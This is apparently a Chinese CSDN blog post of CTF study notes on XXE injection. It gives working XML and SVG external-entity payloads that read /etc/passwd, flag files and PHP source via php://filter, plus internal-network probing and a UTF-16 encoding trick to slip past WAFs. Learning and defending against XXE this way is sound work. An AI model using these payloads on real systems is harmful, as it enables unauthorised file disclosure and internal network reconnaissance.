xxe语句加绕过

最新推荐文章于 2024-10-10 14:15:00 发布
最新推荐文章于 2024-10-10 14:15:00 发布
阅读量345 收藏 1
点赞数 1
文章标签: web安全 网络安全 笔记 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75361164/article/details/134497163
版权

基础语句

解释:
<?xml version="1.0" encoding="utf-8"?>//XML声明,可以不要
   
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>//DTD部分这里的note其实是一个代号吧可以改,和下面的<user></user>对应
<user><username>&admin;</username><password>123456</password></user>//XML部分,一开始就有的

<!DOCTFPE scan [<!ENTITY test SYSTEM "file:///c:/1.txt">]>   DTD部分,这里的是scan,和<scan></scan>对应
<scan>&test;</scan>  XML部分

payload:file(必须写完整路径)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>
<user><username>&admin;</username><password>123</password></user>

payload:php://filter(可以写相对路径,也可以写完整路径)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
  <!ENTITY aaa SYSTEM "php://filter/read=convert.base64-encode/resource=doLogin.php">
  ]>
<a><username>&aaa;</username><password>aaa</password></a>

内网探针

来源:[NCTF2019]True XML cookbook

内网探针常见文件

/etc/hosts
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/fib_trie

语句

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
  <!ENTITY aaa SYSTEM "http://10.128.253.12">
  ]>
<a><username>&aaa;</username><password>aaa</password></a>

如果ip存在,则返回正常

payload

读取/proc/net/fib_trie ,一般好像都是读取/etc/hosts,/proc/net/arp

得到:10.244.80.54
进行C段爆破,更改54,进行爆破

最终在:10.244.80.16得到flag

waf绕过

文章:绕过WAF保护的XXE

编码绕过

原理:

一个xml文档不仅可以用UTF-8编码,也可以用UTF-16(两个变体 - BE和LE)、UTF-32(四个变体 - BE、LE、2143、3412)和EBCDIC编码。
在这种编码的帮助下,使用正则表达式可以很容易地绕过WAF,因为在这种类型的WAF中,正则表达式通常仅配置为单字符集。

先创建一个正常的xml文件,名字为rce.xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>
<user><username>&admin;</username><password>123</password></user>

然后使用kali的命令iconv,进行编码
iconv -f utf8 -t utf-16 '/root/桌面/rce.xml'>2.xml  #将rce.xml改成UTF-16BE编码,放入2.xml中
还有utf-32和EBCDIC没有尝试,以后进行尝试

svg

语法格式

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///etc/passwd" >
]>
<svg height="100" width="1000">
  <text x="10" y="20">&file;</text>
</svg>

其中note和<text></text>可以随便修改,text中的x="10" y="20"不能少,因为于普通xml不同的是,他的数据是以图片的形式回显的,x="10" y="20"决定了大小,没了的话就变成一条线了

于普通的xml的区别

普通的xml二者对比
1.多了svg标签,数据<text x="10" y="20">&file;</text>只能写在svg标签内,可以有多条,但是只能得到一条数据
2.他的数据是以图片的形式回显的

例题

[CSAWQual 2019]Web_Unagi

思路

1.发现upload上传,尝试上传一句话木马,失败
2.upload.php中有一个here链接,点进去,发现xml样式,尝试上传xml文件,发现有waf

在这里插入图片描述

3.尝试使用使用xml编码绕过

payload

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
      <user>
            <username>bob</username>
            <password>passwd2</password>
            <name> Bob</name>
            <email>bob@fakesite.com</email>
            <group>CSAW2019</group>
            <intro>&xxe;</intro>
      </user>
</users>

注:1.&xxe;要写在<intro></intro>里面,应为他intro(简介)能显示更多字符,其他的显示不完全。
   2.<user></user>里面可以只写<intro>&xxe;</intro>,其他的不写不影响内容显示

然后进行编码,命令:
iconv -f utf8 -t utf-16 '/root/桌面/rce.xml'>2.xml  #将rce.xml改成UTF-16BE编码,放入2.xml中

[BSidesCF 2019]SVGMagic

思路

1.题目提示svg图片格式,svg是使用的xml定义图片,尝试构成svg格式的xml,成功回显/etc/passwd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///etc/passwd" >
]>
<svg height="100" width="1000">
  <text x="10" y="20">&file;</text>
</svg>

payload

1.尝试/flag,/flag.txt,/var/www/html/flag.txt,都没有
2.尝试使用/proc/self/pwd/,代表的是当前路径,/proc/self/pwd/flag.txt,成功
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >
]>
<svg height="100" width="1000">
  <text x="10" y="20">&file;</text>
</svg>
尘佑不尘
关注
pentest-wiki:压缩所有(网络)内容
02-01
7. **LD-Preload**:Linux动态链接器的预载技术,有时被用于攻击,绕过程序的安全机制。 8. **XXE**(XML External Entity):XML外部实体注入,利用XML解析器的特性进行攻击。 9. **File-Inclusion**:文件包含...
xxe漏洞
十一.的博客
10-24 88
【代码】xxe漏洞。
XXE&XML】利用检测绕过
qq_41889600的博客
12-13 535
小迪安全xxe xml
网络安全笔记 -- XXE&XML(利用、检测、绕过
swy66的博客
09-24 1625
XXE(XML外部实体注入),利用、检测、绕过
学习日志9:XXE+php://filter绕过WAF读内网文件
m0_37622973的博客
09-08 1442
摘自freebuf 出处:https://www.freebuf.com/vuls/211822.html 基础知识: 1.php://filter是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;使用不同的参数可以达到不同的目的和效果:其中resource=<要过滤的数据流>,指定了要筛选过滤的数据流 2.php的data://text/plain;b...
WEB漏洞-XXE&XML之利用检测绕过全解(39)
san3144393495的博客
06-29 1608
除了这个形式,还有一个过滤,我们绕过思路就是采用协议玩法,换一种协议去执行想要的结果,或者采用外部引用,把核心代码写到外部东西上面去,DTD上面去实现绕过,还有一种编码把一些关键词进行编码,达到关键字的绕过,根据具体情况选出不同的方案。判定这个漏洞存在之后,我们该如何去利用,分为两种,第一种是输出形式,利用的结果显示,分为两种情况,一种情况是有回显,一种是回显;xml:xml被设计成传输和储存数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容。
XXE的利用手法及绕过
qq_36334672的博客
01-29 210
当目标运行我们引用外部实体时,可通过构造恶意数据,执行任意文件读取,内网端口探测,攻击内网,甚至命令执行——安装了expect扩展。XXE主要由DTD文档构成,因此先介绍DTD,如下所示红色部分为DTD1、开头必须声明为XML <?2、第二行为例如 <!DOCTYPE NOTE //声明此文档为NOTE类型DOCTYPE ANY //也可以为ANYDOCTYPE ROOT //ROOT之类3、DTD有内外引用两种方式1)内部的 DOCTYPE 声明2)外部文档声明。
[CSAWQual 2019]Web_Unagi xxe转码绕过waf
qq_54929891的博客
04-28 1427
搜索给我们的信息 flag在flag下面,可能要用到文件读取或者系统命令 可以看到它叫我们上传一个xml文件,应该是xxe漏洞了 这里应该是提示我们会回显哪些属性,可以看到password没有显示出来 利用之前的XXE模板https://xz.aliyun.com/t/6887#toc-0 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]&gt.
147-针对某CS架构系统的渗透测试.pdf
09-20
此外,测试者还注意到客户端安装界面提示需要运行ActiveX控件,并尝试修改用户编号来绕过限制,但未成功。 当测试者输入特定的用户编号如01、02、9999时,系统会显示出一些信息,这让他们联想到了可能存在的XXE...
浅谈php://filter的妙用
10-17
无论是用于防止XXE漏洞,还是用于绕过某些限制,`php://filter`都能发挥其独特的功能,为我们的代码提供更多的可能性。理解并掌握这一协议的用法,对于提升PHP开发的安全性和灵活性都具有重要意义。
网络安全面经收集频率最高的100道题
04-09
CDN绕过可能涉及IP追踪、直接访问源服务器或利用CDN的缓存机制进行攻击。 以上是网络安全面试中常见的问题和解答,理解和掌握这些知识点对于提升安全防护能力至关重要。在实际工作中,还需要不断学习和关注最新的...
网络安全各大厂面试常见问题总结.docx
05-18
客户端校验可通过修改文件扩展名等方式绕过,而服务端校验则更为关键,需要通过严格的文件类型检查来避免潜在的风险。 - **密码学基础**: - 对称密算法如DES、3DES、AES等,非对称密算法如RSA。 - MD5不是一...
WEB漏洞原理】XML&XXE利用检测绕过
过期的秋刀鱼
09-14 1236
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的载,导致可载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害XXE是XML的一个漏洞XXE产生根本原因:网站接受XML数据,没有对xml进行过滤。
SRC挖掘-检测DOCTYPE的XXE绕过
HWHXY的博客
03-04 160
项目中遇到的,简单记录下,服务端检测的ENTRY就不通过,好像没有办法绕过
WEB漏洞-XXE&XML之利用检测绕过全解
xhscxj的博客
02-07 1605
xml基础概念 XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的载,导致可载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 ...
xxe编码绕过(8-19)
Realiy的博客
08-19 1720
[CSAWQual 2019]Web_Unagi 只能上传xml文件,考虑存在xxe 直接上传显示waf拦截了,转换成utf16编码就能绕过 <!--filename:1.xml--> <!--author:ta3shi--> <!DOCTYPE users[ <!ENTITY a SYSTEM "file:///flag"> ]> <users> <user> <username>Alice</u
Web安全攻防-----学习笔记(四)之XXE漏洞、WAF的那些事
舞指如歌~的博客
09-12 832
4.12 XXE漏洞 4.12.1 介绍XXE漏洞 XML外部实体注入(XML External Entity)简称XXE漏洞,XML用于标记电子文档使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档包括XML声明、DTD文档类型定义、文档元素。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的...
XXE的理解与绕过
weixin_50464560的博客
11-30 1608
转载至https://www.freebuf.com/articles/web/291094.html 前置知识XXE如何理解?它是可扩展标记语言 ( XML) 用于存储和传输数据。通常始于异步JavaScript和XML技术(ajax技术):网页应用能够快速地将增量更新呈现在用户界面上,而不需要重载(刷新)整个页面。目前JSON的使用比XML更普遍。JSON和XML都被用于在Ajax模型中的XML技术。这种标记语言允许开发人员定义和表示任意数据结构的HTML。以下为定义属性和值的Security Ass
入门网络安全工程师要学习哪些内容
最新发布
白帽子佳奇的博客
10-10 1328
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值